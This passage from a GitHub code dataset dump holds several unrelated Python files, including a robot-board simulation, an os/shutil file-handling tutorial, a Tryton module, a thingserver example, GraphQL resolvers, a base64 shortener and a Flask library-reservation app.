score > best_score:\r\n best_score = score\r\n best_board = copy.deepcopy(new_board)\r\n # score and time visualization\r\n if VISUALIZE:\r\n print(score, T_LIMIT - abs(time.time() - t_start), flush=True)\r\n # finish if time left < 0.2 seconds\r\n if T_LIMIT - abs(time.time() - t_start) < 0.2:\r\n break\r\n # print final board\r\n for i in range(M):\r\n print(\"\".join(best_board[i]))\r\n if VISUALIZE:\r\n print(best_score)\r\n\r\ndef simulate_board(board, M, S):\r\n stop_count = []\r\n for i in range(M):\r\n stop_count.append([0] * M)\r\n for test_case in S:\r\n # initialize robot position\r\n x = (M - 1) // 2\r\n y = (M - 1) // 2\r\n direction = 0\r\n for command in test_case:\r\n # check for Double / Triple panel\r\n executions = 1\r\n if board[y][x] == \"D\":\r\n executions = 2\r\n elif board[y][x] == \"T\":\r\n executions = 3\r\n for execution in range(executions):\r\n # move forward\r\n if command == \"S\":\r\n if direction == 0: # up\r\n if not board[y-1][x] == \"#\": # check for a wall\r\n y -= 1\r\n elif direction == 1: # right\r\n if not board[y][x+1] == \"#\": # check for a wall\r\n x += 1\r\n elif direction == 2: # down\r\n if not board[y+1][x] == \"#\": # check for a wall\r\n y += 1\r\n elif direction == 3: # left\r\n if not board[y][x-1] == \"#\": # check for a wall\r\n x -= 1\r\n # turn left\r\n elif command == \"L\":\r\n if board[y][x] == \"R\": # check for Right panel\r\n direction = (direction + 1) % 4 # turn right instead\r\n else:\r\n direction = (direction - 1) % 4\r\n elif command == \"R\":\r\n if board[y][x] == \"L\": # check for Left panel\r\n direction = (direction - 1) % 4 # turn left instead\r\n else:\r\n direction = (direction + 1) % 4\r\n stop_count[y][x] += 1 # add stop count of final position\r\n # calculate final score\r\n score = 0\r\n for i in range(M):\r\n for j in range(M):\r\n if stop_count[i][j] == 1:\r\n score += 10\r\n elif stop_count[i][j] == 2:\r\n score += 3\r\n elif stop_count[i][j] == 3:\r\n score += 1\r\n return score\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"takumi152/atcoder","sub_path":"httf2019/httf2019.py","file_name":"httf2019.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11173025602","text":"# Santosh Khadka\n# What if we have to open every file in a directory?\n# What if we want to actually move files around on our computer?\n\nimport os # Allows for command line style commands\nimport shutil # Move files around\nimport send2trash # Delete files to resycle bin. 
pip install send2trash\nf = open(\"practice.txt\", 'w+')\nf.write(\"Santosh Khadka\")\nf.close()\n\nprint(os.getcwd()) # Works because of os\n# print(str(os.getcwd()).replace(\"\\\\\", \"\\\\\\\\\")) # Replace \\ with \\\\\n# print(os.listdir()) # same as ls command\n# print(os.listdir('C:\\\\Users\\\\PC-SK\\\\Desktop\\\\GIT_STUFF\\\\MINE\\\\learning_algos\\\\Learning-python')) # print all files in 'directory'\n# print(os.listdir('C:\\\\Users\\\\PC-SK\\\\Desktop\\\\GIT_STUFF\\MINE\\\\learning_algos\\\\Learning-python')) # Need to use \\\\ instead of \\\n \n# shutil.move('practice.txt', 'C:\\\\Users\\\\PC-SK\\\\Desktop\\\\GIT_STUFF\\\\MINE\\\\learning_algos\\\\Learning-python\\\\Section 14 - Advanced Python Modules\\\\end') # Error if specified file not found\n\n'''\nDeleting Files\n\nNOTE: The os module provides 3 methods for deleting files:\n\n os.unlink(path) which deletes a file at the path your provide\n os.rmdir(path) which deletes a folder (folder must be empty) at the path your provide\n shutil.rmtree(path) this is the most dangerous, as it will remove all files and folders contained in the path. \n \n All of these methods can not be reversed! Won't be able to recover the file. \n Instead use send2trash module: Safer alternative that sends deleted files to trash bin instead of permanent delete.\n \n send2trash: pip install send2trash \n'''\n# print('Before delete: ', os.listdir())\n# send2trash.send2trash('practice.txt') # can put the entire path or just the file name if in the same directory.\n# print('After delete: ', os.listdir())\n\n## Looks in given file path and outputs the name of all sub-folders and files in them\n## Can add in logic to find only folders/files you're looking for. Ex date, id, etc.\nfile_path = \"C:\\\\Users\\\\PC-SK\\\\Desktop\\\\GIT_STUFF\\\\MINE\\\\learning_algos\\\\Learning-python\\\\Section 14 - Advanced Python Modules\\\\start\"\nfor folder, sub_folders, files in os.walk(file_path):\n print(f\"\\nCurrently looking at {folder}\")\n print('Subfolders are: ')\n for folder in sub_folders:\n print(f\"Sub-folder: {folder}\")\n print(\"The files are: \")\n for items in files:\n print(f\"File: {items}\")\n","repo_name":"skhadka007/learning_algos","sub_path":"Learning-python/Section 14 - Advanced Python Modules/osModules.py","file_name":"osModules.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38439417221","text":"from trytond.pool import Pool, PoolMeta\nfrom trytond.model import fields\nfrom trytond.transaction import Transaction\n\n__all__ = ['SaleLine']\n\n\nclass SaleLine(metaclass=PoolMeta):\n __name__ = 'sale.line'\n\n @fields.depends('product')\n def on_change_product(self):\n Product = Pool().get('product.product')\n\n super(SaleLine, self).on_change_product()\n\n lang = Transaction().context.get('language')\n\n if self.product and self.product.description:\n # get party lang\n party_context = {}\n if self.sale and self.sale.party:\n party = self.sale.party\n if party.lang:\n party_context['language'] = party.lang.code\n\n # reload product by lang when is different party lang and user lang\n if party_context.get('language') and (lang != party_context['language']):\n with Transaction().set_context(party_context):\n self.description = Product(self.product.id).description\n else:\n self.description = 
self.product.description\n","repo_name":"NaN-tic/trytond-sale_description","sub_path":"sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5632559030","text":"from __future__ import division\n\nimport asyncio\nimport logging\nimport sys\nimport time\nimport uuid\n\nfrom thingserver import Action, Event, Property, Thing, Value, WebThingServer\n\nif (\n sys.version_info[0] == 3\n and sys.version_info[1] >= 8\n and sys.platform.startswith(\"win\")\n):\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n\n\nclass OverheatedEvent(Event):\n def __init__(self, thing, data):\n Event.__init__(self, thing, \"overheated\", data=data)\n\n\ndef make_thing():\n thing = Thing(\n \"urn:dev:ops:my-lamp-1234\",\n \"My Lamp\",\n [\"OnOffSwitch\", \"Light\"],\n \"A web connected lamp\",\n )\n\n thing.add_context(\"https://iot.mozilla.org/schemas\")\n\n on_property = Property(\n thing,\n \"on\",\n Value(True, None, lambda x: print(x)),\n metadata={\n \"@type\": \"OnOffProperty\",\n \"title\": \"On/Off\",\n \"type\": \"boolean\",\n \"description\": \"Whether the lamp is turned on\",\n },\n )\n\n brightness_property = Property(\n thing,\n \"brightness\",\n Value(50, None, lambda x: print(x)),\n metadata={\n \"@type\": \"BrightnessProperty\",\n \"title\": \"Brightness\",\n \"type\": \"integer\",\n \"description\": \"The level of light from 0-100\",\n \"minimum\": 0,\n \"maximum\": 100,\n \"unit\": \"percent\",\n },\n )\n\n thing.add_property(on_property)\n thing.add_property(brightness_property)\n\n async def fade_function(args):\n print(\"Starting fade function\")\n await asyncio.sleep(args[\"duration\"] / 1000)\n await brightness_property.set_value(args[\"brightness\"])\n print(\"Finished fade function\")\n return \"Return value\"\n\n fade_action = Action(\n thing,\n \"fade\",\n fade_function,\n metadata={\"title\": \"Fade\", \"description\": \"Fade the lamp to a given level\",},\n input_={\n \"type\": \"object\",\n \"required\": [\"brightness\", \"duration\",],\n \"properties\": {\n \"brightness\": {\n \"type\": \"integer\",\n \"minimum\": 0,\n \"maximum\": 100,\n \"unit\": \"percent\",\n },\n \"duration\": {\"type\": \"integer\", \"minimum\": 1, \"unit\": \"milliseconds\",},\n },\n },\n output={\"type\": \"string\"},\n )\n\n thing.add_action(fade_action)\n\n thing.add_available_event(\n \"overheated\",\n {\n \"description\": \"The lamp has exceeded its safe operating temperature\",\n \"type\": \"number\",\n \"unit\": \"degree celsius\",\n },\n )\n\n return thing\n\n\ndef run_server():\n thing = make_thing()\n\n server = WebThingServer(thing, port=8888, debug=True)\n try:\n logging.info(\"starting the server\")\n server.start()\n except KeyboardInterrupt:\n logging.info(\"stopping the server\")\n server.stop()\n logging.info(\"done\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=10, format=\"%(asctime)s %(filename)s:%(lineno)s %(levelname)s %(message)s\"\n )\n run_server()\n","repo_name":"labthings/python-thingserver","sub_path":"example/single-thing.py","file_name":"single-thing.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73293186292","text":"from graphene import (\r\n ObjectType,\r\n String,\r\n Boolean,\r\n List,\r\n Int,Date\r\n)\r\nfrom .persona import Persona as PersonaModel\r\nfrom .objects import Persona, 
Departamento, Vehiculo, Registro, Infraccion\r\nfrom .departamento import Departamento as DepartamentoModel\r\nfrom .vehiculo import Vehiculo as VehiculoModel\r\nfrom .registro import Registro as RegistroModel\r\nfrom .infraccion import Infraccion as InfraccionModel\r\n\r\nclass Query(ObjectType):\r\n    personas = List(lambda: Persona, last_name=String(), id=Int(), has_email=Boolean(), order_by_name=Boolean())\r\n    departamentos = List(lambda: Departamento)\r\n    vehiculo = List(lambda: Vehiculo, patente=String(), categoria_vehiculo=String(), anio_fabricacion=Int(), nombre_propietario=String(), domicilio_propietario=String())\r\n    registro = List(lambda: Registro, numero=Int(), nombre_chofer=String(), domicilio_chofer=String(), edad=Int(), grupo_sanguineo=String(), categoria=String(), fecha_emision=Date(), fecha_vencimiento=Date())\r\n    infraccion = List(lambda: Infraccion, numero_infraccion=Int(), fecha_infraccion=Int(), observaciones=String(), patente=String())\r\n\r\n    def resolve_personas(self, info, id=None, last_name=None, has_email=None, order_by_name=None):\r\n        query = Persona.get_query(info=info)\r\n        if id:\r\n            query = query.filter(PersonaModel.id == id)\r\n        if last_name:\r\n            query = query.filter(PersonaModel.last_name == last_name)\r\n        if has_email is not None:\r\n            if has_email:\r\n                query = query.filter(PersonaModel.email != None)\r\n            else:\r\n                query = query.filter(PersonaModel.email == None)\r\n        if order_by_name:\r\n            query = query.order_by(PersonaModel.name)\r\n        return query.all()\r\n\r\n    def resolve_departamentos(self, info):\r\n        query = Departamento.get_query(info=info)\r\n        return query.all()\r\n\r\n    def resolve_vehiculo(self, info, patente=None, categoria_vehiculo=None, anio_fabricacion=None, nombre_propietario=None, domicilio_propietario=None):\r\n        query = Vehiculo.get_query(info=info)\r\n        if patente:\r\n            query = query.filter(VehiculoModel.patente == patente)\r\n        if categoria_vehiculo:\r\n            query = query.filter(VehiculoModel.categoria_vehiculo == categoria_vehiculo)\r\n        if anio_fabricacion:\r\n            query = query.filter(VehiculoModel.anio_fabricacion == anio_fabricacion)\r\n        if nombre_propietario:\r\n            query = query.filter(VehiculoModel.nombre_propietario == nombre_propietario)\r\n        if domicilio_propietario:\r\n            query = query.filter(VehiculoModel.domicilio_propietario == domicilio_propietario)\r\n        return query.all()\r\n\r\n    def resolve_registro(self, info, numero=None, nombre_chofer=None, domicilio_chofer=None, edad=None, grupo_sanguineo=None, categoria=None, fecha_emision=None, fecha_vencimiento=None):\r\n        query = Registro.get_query(info=info)\r\n        if numero:\r\n            query = query.filter(RegistroModel.numero == numero)\r\n        if nombre_chofer:\r\n            query = query.filter(RegistroModel.nombre_chofer == nombre_chofer)\r\n        if domicilio_chofer:\r\n            query = query.filter(RegistroModel.domicilio_chofer == domicilio_chofer)\r\n        if edad:\r\n            query = query.filter(RegistroModel.edad == edad)\r\n        if grupo_sanguineo:\r\n            query = query.filter(RegistroModel.grupo_sanguineo == grupo_sanguineo)\r\n        if categoria:\r\n            query = query.filter(RegistroModel.categoria == categoria)\r\n        if fecha_emision:\r\n            query = query.filter(RegistroModel.fecha_emision == fecha_emision)\r\n        if fecha_vencimiento:\r\n            query = query.filter(RegistroModel.fecha_vencimiento == fecha_vencimiento)\r\n        return query.all()\r\n\r\n    def resolve_infraccion(self, info, numero_infraccion=None, fecha_infraccion=None, observaciones=None, patente=None):\r\n        query = Infraccion.get_query(info=info)\r\n        if numero_infraccion:\r\n            query = query.filter(InfraccionModel.numero_infraccion == numero_infraccion)\r\n        if fecha_infraccion:\r\n            query = query.filter(InfraccionModel.fecha_infraccion == fecha_infraccion)\r\n        if observaciones:\r\n            query = query.filter(InfraccionModel.observaciones == observaciones)\r\n        if patente:\r\n            query = query.filter(InfraccionModel.patente == patente)\r\n        return
query.all()\r\n","repo_name":"MagaliLandini/Back","sub_path":"base de dato/models/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"284379043","text":"#!/usr/bin/python\n\"\"\"Let's have us some base64 for simple integer keys.\"\"\"\n\nfrom math import log, floor\n\n# Completely bikeshedded base64 character set, aimed at maximal\n# typability.\ncharset = '.abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-'\n\ndef encode64(number):\n if number == 0:\n return charset[0]\n text = ''\n width = int(floor(log(number, 64)))\n for power in xrange(width, -1, -1):\n place_value = number / 64**power\n text += charset[place_value]\n number -= place_value * 64**power\n return text\n\ndef decode64(text):\n number = 0\n for power in xrange(len(text) - 1, -1, -1):\n place_value = charset.index(text[len(text) - power - 1])\n number += place_value * 64**power\n return number\n","repo_name":"cryogen/yardbird","sub_path":"yardbird/contrib/shortener.py","file_name":"shortener.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41726481462","text":"def biodata(nama, alamat, tanggal, umur, bb, tb):\n\n meter = tb / 100\n bmi = bb / (meter * meter)\n\n if bmi < 18.5:\n ideal = 'Kurus'\n elif bmi <= 24.9:\n ideal = 'Normal'\n else:\n ideal = 'Gemuk'\n\n return f'''\n =================\n ===> Biodata <===\n =================\n\n Nama : {nama}\n Alamat : {alamat}\n Tanggal : {tanggal}\n Usia : {str(umur)}\n Tinggi Badan : {str(tb)} cm\n Berat badan : {str(bb)}kg - {ideal}\n '''\n\n\nprint(\n biodata('Febry Billiyagi Karsidi',\n 'Jl.Pabrik Kulit RT05/RW03, Cibinong - Bogor', '19 Februari 2003',\n 19, 51, 170))\n","repo_name":"billiyagi/myPython","sub_path":"DDP Tugas 9/biodata.py","file_name":"biodata.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9408512030","text":"import os\n\nfrom cs50 import SQL\nfrom flask import Flask, redirect, render_template, request, session\nfrom flask_mail import Mail, Message\n\nfrom flask_session import Session\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nfrom helpers import login_required, apology, send_reservation_details, admin_access_required, generate_qrcode_for_reservation\nfrom datetime import datetime, timedelta\n\n\n# Configure application\napp = Flask(__name__)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\n\n# Configure administator's mail\napp.config['MAIL_SERVER']= 'smtp.poczta.onet.pl'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USERNAME'] = str(os.environ['admin_email'])\napp.config['MAIL_PASSWORD'] = str(os.environ['admin_password'])\napp.config['MAIL_USE_TLS'] = False\nmail = Mail(app)\n\nSession(app)\n\n# Configure CS50 Library to use SQLite database called library.db\ndb = SQL(\"sqlite:///library.db\")\n\nMAX_AMOUNT_OF_CHARACTERS = 1000\nMAX_AMOUNT_OF_RESERVATIONS = 5\n\n@app.after_request\ndef after_request(response):\n \"\"\"Ensure responses aren't cached\"\"\"\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n 
response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n# Admin's backend!\n\n@app.route(\"/admin\")\n@login_required\n@admin_access_required\ndef homepage_admin():\n return render_template(\"home_admin.html\")\n\n@app.route(\"/books_admin\")\n@login_required\n@admin_access_required\ndef books_admin():\n \"\"\"Render all books from library collection\"\"\"\n books = db.execute(\n \"SELECT book_id, title, description, genre, photo_adress FROM books\")\n occupied_books = db.execute(\n \"SELECT books.book_id, title, description, genre, photo_adress FROM books INNER JOIN reservations ON books.book_id=reservations.book_id WHERE books.book_id IN (SELECT reservations.book_id FROM reservations)\")\n occupied_books_ids_only = []\n for occupied_book in occupied_books:\n occupied_books_ids_only.append(occupied_book[\"book_id\"])\n return render_template(\"books_admin.html\", books=books, occupied_books_ids_only=occupied_books_ids_only)\n\n\n@app.route(\"/admin_search_books\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_search_books():\n \"\"\"Search through all books from library collection\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"search_type_books\") or not request.form.get(\"ID\"):\n return redirect(\"/books_admin\")\n search_type = request.form.get(\"search_type_books\")\n search_id_title = request.form.get(\"ID\")\n if search_type == \"Book\":\n books = db.execute(\"SELECT book_id, title, description, genre, photo_adress FROM books WHERE book_id = ?\", search_id_title)\n return render_template(\"books_admin.html\", books=books)\n elif search_type == \"Title\":\n sql_search_id_title = \"%\" + search_id_title + \"%\"\n books = db.execute(f\"SELECT book_id, title, description, genre, photo_adress FROM books WHERE title LIKE ?\", sql_search_id_title)\n return render_template(\"books_admin.html\", books=books)\n elif search_type == \"Genre\":\n sql_search_id_title = \"%\" + search_id_title + \"%\"\n books = db.execute(f\"SELECT book_id, title, description, genre, photo_adress FROM books WHERE genre LIKE ?\", sql_search_id_title)\n return render_template(\"books_admin.html\", books=books)\n else:\n return redirect(\"/books_admin\")\n\n@app.route(\"/add_new_book_admin\", methods=[\"GET\", \"POST\"])\n@login_required\n@admin_access_required\ndef add_new_book():\n \"\"\"Add new book(s) to collection\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"title\"):\n return apology(\"must provide title\", 400)\n elif not request.form.get(\"description\"):\n return apology(\"must provide description\", 400)\n elif not request.form.get(\"genre\"):\n return apology(\"must provide genre\", 400)\n elif not request.form.get(\"photo_adress\"):\n return apology(\"must provide photo adress\", 400)\n elif not request.form.get(\"ammount\"):\n return apology(\"must provide ammount\", 400)\n\n title = str(request.form.get(\"title\"))\n description = str(request.form.get(\"description\"))\n genre = str(request.form.get(\"genre\"))\n photo_adress = request.form.get(\"photo_adress\")\n ammount = int(request.form.get(\"ammount\"))\n\n if ammount < 1:\n return apology(\"must provide ammount >= 1\", 400)\n elif len(description) > MAX_AMOUNT_OF_CHARACTERS:\n return apology(f\"must provide description with no more than {MAX_AMOUNT_OF_CHARACTERS} characters\", 400)\n\n for i in range(ammount):\n db.execute(\n \"INSERT INTO books (description, title, genre, photo_adress) VALUES(?, ?, ?, ?)\", description, title, genre, photo_adress)\n return 
redirect(\"/books_admin\")\n else:\n return render_template(\"add_new_book_admin.html\")\n\n@app.route(\"/admin_reservations\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_reservations():\n \"\"\"Show all reservations\"\"\"\n reservations_dict = db.execute(\n \"SELECT reservation_id, book_id, deadline, users.user_id, users.email, users.phone_number FROM reservations INNER JOIN users ON users.user_id=reservations.user_id\")\n return render_template(\"admin_reservations.html\", reservations=reservations_dict)\n\n@app.route(\"/returned_to_collection\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef returned_to_collection():\n \"\"\"Return specific book to collection (book is free)\"\"\"\n if request.method == \"POST\":\n reservation_id = request.form.get(\"reservation_id\")\n rows = db.execute(\"SELECT book_id, deadline, users.user_id, email FROM reservations INNER JOIN users ON users.user_id=reservations.user_id WHERE reservation_id = ?\", reservation_id)[0]\n book_id = rows[\"book_id\"]\n user_id = rows[\"user_id\"]\n user_email = rows[\"email\"]\n deadline = rows[\"deadline\"]\n end_datetime = datetime.now().strftime(\"%Y-%m-%d\")\n end_date = datetime.strptime(end_datetime, \"%Y-%m-%d\")\n end_date = end_date.strftime(\"%Y-%m-%d\")\n db.execute(\"INSERT INTO history (reservation_id, book_id, user_id, email, deadline, date_returned) VALUES(?, ?, ?, ?, ?, ?)\", reservation_id, book_id, user_id, user_email, deadline, end_date)\n db.execute(\"DELETE FROM reservations WHERE reservation_id = ?\", reservation_id)\n return redirect(\"/admin_reservations\")\n\n\n@app.route(\"/send_reminder\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef send_reminder():\n \"\"\"Warn user\"\"\"\n if request.method == \"POST\":\n reservation_id = request.form.get(\"reservation_id\")\n specific_reservation = db.execute(\"SELECT book_id, deadline FROM reservations WHERE reservation_id = ?\", reservation_id)[0]\n book_id = specific_reservation[\"book_id\"]\n deadline = specific_reservation[\"deadline\"]\n user_email = db.execute(\"SELECT email FROM users INNER JOIN reservations on users.user_id=reservations.user_id WHERE reservation_id = ?\", reservation_id)[0][\"email\"]\n admin_email = str(os.environ['admin_email'])\n subject = f'Return book to the library! Reminder for reservation ID {reservation_id}'\n beginning_of_message = f'Please return borrowed book within 5 days. Book id : {book_id}, Reservation ID : {reservation_id}. Your first deadline was {deadline}.\\n'\n msg = Message(subject, sender=admin_email, recipients=[user_email])\n msg.body = beginning_of_message\n try:\n mail.send(msg)\n except:\n return apology(\"Something went wrong\", 400)\n return redirect(\"/admin_reservations\")\n\n@app.route(\"/admin_search\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_search():\n \"\"\"Search through reservations\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"search_type\") or not request.form.get(\"ID\"):\n return redirect(\"/admin_reservations\")\n search_type = request.form.get(\"search_type\")\n search_id = request.form.get(\"ID\")\n if search_type == \"User\":\n reservations_dict = db.execute(\n \"SELECT reservation_id, book_id, deadline, users.user_id, users.email, users.phone_number FROM reservations INNER JOIN users ON users.user_id=reservations.user_id WHERE reservations.user_id = ? 
\", search_id)\n return render_template(\"admin_reservations.html\", reservations=reservations_dict)\n\n elif search_type == \"Reservation\":\n reservations_dict = db.execute(\n \"SELECT reservation_id, book_id, deadline, users.user_id, users.email, users.phone_number FROM reservations INNER JOIN users ON users.user_id=reservations.user_id WHERE reservations.reservation_id = ? \", search_id)\n return render_template(\"admin_reservations.html\", reservations=reservations_dict)\n elif search_type == \"Book\":\n reservations_dict = db.execute(\n \"SELECT reservation_id, book_id, deadline, users.user_id, users.email, users.phone_number FROM reservations INNER JOIN users ON users.user_id=reservations.user_id WHERE reservations.book_id = ? \", search_id)\n return render_template(\"admin_reservations.html\", reservations=reservations_dict)\n else:\n return redirect(\"/admin_reservations\")\n\n\n@app.route(\"/admin_history\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_history():\n \"\"\"Show everything from archives\"\"\"\n rows = db.execute(\"SELECT * FROM history\")\n return render_template(\"admin_history.html\", rows=rows)\n\n\n@app.route(\"/admin_history_search\", methods=[\"GET\", \"POST\"])\n@admin_access_required\n@login_required\ndef admin_history_search():\n \"\"\"Search archives by admin\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"search_type_history\") or not request.form.get(\"ID\"):\n return redirect(\"/admin_history\")\n search_type = request.form.get(\"search_type_history\")\n search_id = request.form.get(\"ID\")\n if search_type == \"User\":\n rows = db.execute(\"SELECT * FROM history WHERE user_id = ? \", search_id)\n return render_template(\"admin_history.html\", rows=rows)\n elif search_type == \"Book\":\n rows = db.execute(\"SELECT * FROM history WHERE book_id = ? \", search_id)\n return render_template(\"admin_history.html\", rows=rows)\n elif search_type == \"Reservation\":\n rows = db.execute(\"SELECT * FROM history WHERE reservation_id = ? 
\", search_id)\n return render_template(\"admin_history.html\", rows=rows)\n else:\n return redirect(\"/admin_reservations\")\n\n# User's backend!\n\n@app.route(\"/\")\n@login_required\ndef homepage():\n return render_template(\"home.html\")\n\n\n@app.route(\"/personal_data\")\n@login_required\ndef personal_data():\n \"\"\"Show user's personal data\"\"\"\n rows = db.execute(\"SELECT user_id, email, phone_number FROM users WHERE user_id = ?\", session[\"user_id\"])\n user_id = rows[0][\"user_id\"]\n email = rows[0][\"email\"]\n phone_number = rows[0][\"phone_number\"]\n return render_template(\"personal_data.html\", user_id=user_id, email=email, phone_number=phone_number)\n\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\n@login_required\ndef search():\n \"\"\"Search books by genres\"\"\"\n genres = db.execute(\"SELECT DISTINCT genre FROM books WHERE book_id NOT IN (SELECT book_id FROM reservations)\")\n if request.method == \"POST\":\n chosen_genre = request.form.get(\"chosen_genre\")\n if chosen_genre == \"All\":\n books_dict = db.execute(\n \"SELECT book_id, title, description, genre, photo_adress FROM books WHERE book_id NOT IN (SELECT book_id FROM reservations)\")\n else:\n books_dict = db.execute(\n \"SELECT book_id, title, description, genre, photo_adress FROM books WHERE book_id NOT IN (SELECT book_id FROM reservations) AND genre LIKE ?\", chosen_genre)\n else:\n books_dict = db.execute(\n \"SELECT book_id, title, description, genre, photo_adress FROM books WHERE book_id NOT IN (SELECT book_id FROM reservations)\")\n return render_template(\"search.html\", books=books_dict, genres=genres)\n\n\n@app.route(\"/reserve_book\", methods=[\"GET\", \"POST\"])\n@login_required\ndef reserve_book():\n \"\"\"Reserve book for user\"\"\"\n if request.method == \"POST\":\n reservations_dict = db.execute(\"SELECT reservation_id FROM reservations WHERE user_id = ?\", session[\"user_id\"])\n if len(reservations_dict) >= MAX_AMOUNT_OF_RESERVATIONS:\n return apology(f\"One student can borrow only {MAX_AMOUNT_OF_RESERVATIONS} books!\", 400)\n\n user_rows = db.execute(\"SELECT email FROM users WHERE user_id = ?\", session[\"user_id\"])\n user_id = session[\"user_id\"]\n user_email = user_rows[0][\"email\"]\n book_id = request.form.get(\"reserved_book\")\n\n begin_datetime = datetime.now().strftime(\"%Y-%m-%d\")\n begin_date = datetime.strptime(begin_datetime, \"%Y-%m-%d\")\n \n # Deadline is 30 days later\n deadline = (begin_date + timedelta(days=30)).strftime(\"%Y-%m-%d\")\n begin_date = begin_date.strftime(\"%Y-%m-%d\")\n db.execute(\n \"INSERT INTO reservations (book_id, user_id, deadline) VALUES(?, ?, ?)\", book_id, user_id, deadline)\n\n reservation_id = db.execute(\"SELECT reservation_id FROM reservations ORDER BY reservation_id DESC LIMIT 1\")[0][\"reservation_id\"]\n book_title = db.execute(\"SELECT title FROM books WHERE book_id = ?\", book_id)[0][\"title\"]\n\n generate_qrcode_for_reservation(book_id, book_title, reservation_id, user_email, user_id)\n send_reservation_details(book_id, book_title, reservation_id, user_email, mail)\n return redirect(\"/reservations\")\n else:\n return redirect(\"/reservations\")\n\n@app.route(\"/reservations\", methods=[\"GET\", \"POST\"])\n@login_required\ndef reservations():\n \"\"\"Show user's reservations\"\"\"\n reservations_dict = db.execute(\n \"SELECT reservation_id, reservations.book_id, title, photo_adress, deadline FROM reservations INNER JOIN books ON books.book_id=reservations.book_id WHERE user_id = ?\", session[\"user_id\"])\n return 
render_template(\"reservations.html\", reservations=reservations_dict)\n\n@app.route(\"/contact_us\", methods=[\"GET\", \"POST\"])\n@login_required\ndef contact_us():\n \"\"\"Send help form to administrator\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"message\"):\n return apology(\"must provide message\", 400)\n\n message = str(request.form.get(\"message\"))\n if len(message) > MAX_AMOUNT_OF_CHARACTERS:\n return apology(f\"Your message is too long! Max {MAX_AMOUNT_OF_CHARACTERS} characters\", 400)\n\n rows = db.execute(\"SELECT * FROM users WHERE user_id = ?\", session[\"user_id\"])\n\n admin_email = str(os.environ['admin_email'])\n user_email = str(rows[0]['email'])\n user_phone = str(rows[0]['phone_number'])\n\n subject = f'New library message from {user_email} appears!'\n beginning_of_message = f'User {user_email} (ID {session[\"user_id\"]}) with phone number {user_phone} wrote to you: \\n'\n message = beginning_of_message + message\n msg = Message(subject, sender=admin_email, recipients=[admin_email])\n msg.body = message\n try:\n mail.send(msg)\n except:\n return apology(\"Something went wrong\", 400)\n return redirect(\"/\")\n\n else:\n return render_template(\"contact_us.html\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n\n # Forget any user_id\n session.clear()\n\n if request.method == \"POST\":\n if not request.form.get(\"email\"):\n return apology(\"must provide email\", 400)\n\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n\n # Check if user is an admin\n admin_rows = db.execute(\"SELECT * FROM admins WHERE email = ?\", request.form.get(\"email\"))\n if len(admin_rows) == 1 and check_password_hash(admin_rows[0][\"hash\"], request.form.get(\"password\")):\n session[\"user_id\"] = admin_rows[0][\"admin_id\"]\n return redirect(\"/admin\")\n\n rows = db.execute(\"SELECT * FROM users WHERE email = ?\", request.form.get(\"email\"))\n\n # Ensure email exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\", 400)\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"user_id\"]\n\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Register new user\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"email\"):\n return apology(\"must provide email\", 400)\n elif not request.form.get(\"phone_number\"):\n return apology(\"must provide phone number\", 400)\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n elif not request.form.get(\"check_password\"):\n return apology(\"must confirm password\", 400)\n\n email = request.form.get(\"email\")\n phone_number = request.form.get(\"phone_number\")\n password = request.form.get(\"password\")\n confirmation = 